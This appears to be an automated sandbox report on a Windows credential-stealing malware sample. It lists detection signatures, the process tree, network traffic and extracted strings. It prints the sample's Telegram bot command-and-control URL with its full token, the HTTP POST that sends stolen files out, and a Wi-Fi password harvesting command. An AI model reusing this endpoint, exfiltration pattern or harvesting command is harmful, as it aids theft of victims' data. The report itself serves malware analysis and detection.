Edit tour

Windows Analysis Report
17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Overview

General Information

Sample name:	17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe
Analysis ID:	1591658
MD5:	2ae0772ccbb6ba5fdbd9c2e8369d0f02
SHA1:	16ecc3070e5a4347d8bee0d5fed8f99c57769efc
SHA256:	3af1eea1320c617f8607630704e19422a743eac1b6fb5e941ccb3e88f320610b
Tags:	base64-decodedexeuser-abuse_ch
Infos:

Detection

PXRECVOWEIWOEI Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected PXRECVOWEIWOEI Stealer

Yara detected Telegram RAT

AI detected suspicious sample

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses netsh to modify the Windows network and firewall settings

Uses the Telegram API (likely for C&C communication)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe" MD5: 2AE0772CCBB6BA5FDBD9C2E8369D0F02)

cmd.exe (PID: 1304 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6436 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 5964 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 5908 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

msiexec.exe (PID: 6212 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendMessage"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1526841628.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PXRECVOWEIWOEI	Yara detected PXRECVOWEIWOEI Stealer	Joe Security
00000002.00000002.1526841628.0000000002B98000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PXRECVOWEIWOEI	Yara detected PXRECVOWEIWOEI Stealer	Joe Security
00000002.00000002.1526841628.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PXRECVOWEIWOEI	Yara detected PXRECVOWEIWOEI Stealer	Joe Security
00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe PID: 6580	JoeSecurity_PXRECVOWEIWOEI	Yara detected PXRECVOWEIWOEI Stealer	Joe Security
Process Memory Space: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe PID: 6580	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe PID: 6580	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe PID: 6580	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 3 entries

Sigma Signatures

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe", ParentImage: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, ParentProcessId: 6580, ParentProcessName: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 1304, ProcessName: cmd.exe

Suricata Signatures

ETPRO MALWARE UNK Stealer Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T09:09:25.107303+0100	2855039	1	A Network Trojan was detected	192.168.2.9	49720	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T09:09:24.876838+0100	1810008	1	Potentially Bad Traffic	192.168.2.9	49720	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe.6580.2.memstrmin

Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendMessage"}

Multi AV Scanner detection for submitted file

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Virustotal: Detection: 43%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49720 version: TLS 1.2

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49720 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2855039 - Severity 1 - ETPRO MALWARE UNK Stealer Telegram Exfil : 192.168.2.9:49720 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: POST /bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638725121748206353Host: api.telegram.orgContent-Length: 3052Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: icanhazip.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: 57.122.6.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638725121748206353Host: api.telegram.orgContent-Length: 3052Connection: Keep-Alive

Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: cert9.db.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cert9.db.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: cert9.db.2.dr	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: cert9.db.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cert9.db.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cert9.db.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cert9.db.2.dr	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.00000000026B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.00000000026B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://icanhazip.com/X
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.000000000293D000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.000000000293D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: cert9.db.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: cert9.db.2.dr	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.00000000026B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cert9.db.2.dr	String found in binary or memory: http://x1.c.lencr.org/0
Source: cert9.db.2.dr	String found in binary or memory: http://x1.i.lencr.org/0
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8122064310:AAFBCVyMfJVoD3s1eB-6ymRD9cZooNbGkNo/sendDocument
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.00000000026C2000.00000004.00000800.00020000.00000000.sdmp, tmpB696.tmp.dat.2.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: tmpB696.tmp.dat.2.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tmpB20C.tmp.dat.2.dr	String found in binary or memory: https://support.mozilla.org
Source: tmpB20C.tmp.dat.2.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmpB20C.tmp.dat.2.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/getcountry.php
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012CEF000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.0000000012D57000.00000004.00000800.00020000.00000000.sdmp, tmpB724.tmp.dat.2.dr, tmpB4FD.tmp.dat.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tmpB20C.tmp.dat.2.dr	String found in binary or memory: https://www.mozilla.org
Source: tmpB20C.tmp.dat.2.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: tmpB20C.tmp.dat.2.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.00000000126D0000.00000004.00000800.00020000.00000000.sdmp, tmpB20C.tmp.dat.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmpB20C.tmp.dat.2.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.00000000126D0000.00000004.00000800.00020000.00000000.sdmp, tmpB20C.tmp.dat.2.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1528524035.00000000126D0000.00000004.00000800.00020000.00000000.sdmp, tmpB20C.tmp.dat.2.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, tmpDCE2.tmp.dat.2.dr	String found in binary or memory: https://www.office.com/
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1526841628.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/0
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1533359936.000000001BC00000.00000004.00000020.00020000.00000000.sdmp, tmpDCE2.tmp.dat.2.dr	String found in binary or memory: https://www.office.com/Office
Source: 17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe, 00000002.00000002.1533359936.000000001BC00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.oracle.com/technetwork/java/javase/downloads

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49720 version: TLS 1.2

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF886FC377D	2_2_00007FF886FC377D
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887002650	2_2_00007FF887002650
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF886FD2326	2_2_00007FF886FD2326
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF886FD30D2	2_2_00007FF886FD30D2
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF886FF0C90	2_2_00007FF886FF0C90
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF886FC10FA	2_2_00007FF886FC10FA
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF886FC1035	2_2_00007FF886FC1035
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887142825	2_2_00007FF887142825
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF88714F729	2_2_00007FF88714F729
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF88712D060	2_2_00007FF88712D060
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887120090	2_2_00007FF887120090
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF88714EFA0	2_2_00007FF88714EFA0
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887143E1C	2_2_00007FF887143E1C
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887121D0C	2_2_00007FF887121D0C
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF88714DC40	2_2_00007FF88714DC40
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF88714EC90	2_2_00007FF88714EC90
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF88715D780	2_2_00007FF88715D780
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887142508	2_2_00007FF887142508
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF8871505F2	2_2_00007FF8871505F2
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887142498	2_2_00007FF887142498
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF8871504F0	2_2_00007FF8871504F0
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF8871504F2	2_2_00007FF8871504F2
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887150318	2_2_00007FF887150318
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF8871503D3	2_2_00007FF8871503D3
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF8871391FA	2_2_00007FF8871391FA
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF8871391F8	2_2_00007FF8871391F8
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF8871501FA	2_2_00007FF8871501FA
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887139200	2_2_00007FF887139200
Source: C:\Users\user\Desktop\17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exe	Code function: 2_2_00007FF887123285	2_2_00007FF887123285
